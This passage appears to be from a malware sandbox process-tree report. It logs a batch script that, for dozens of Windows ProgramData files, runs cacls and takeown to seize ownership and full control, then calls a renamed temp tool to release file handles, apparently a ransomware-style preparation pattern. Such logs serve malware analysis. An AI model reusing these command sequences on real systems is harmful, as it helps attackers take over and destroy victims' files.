- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:3452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:3420
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:3884
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:3056
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:3056
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:64
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    - Modifies file permissions
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:3884
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:1104
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab""
  2⤵
  PID:992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    - Modifies file permissions
    PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "background.png" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      PID:1104
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:3760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:3940
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      PID:1388
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:3352
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:3472
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\takeown.exe
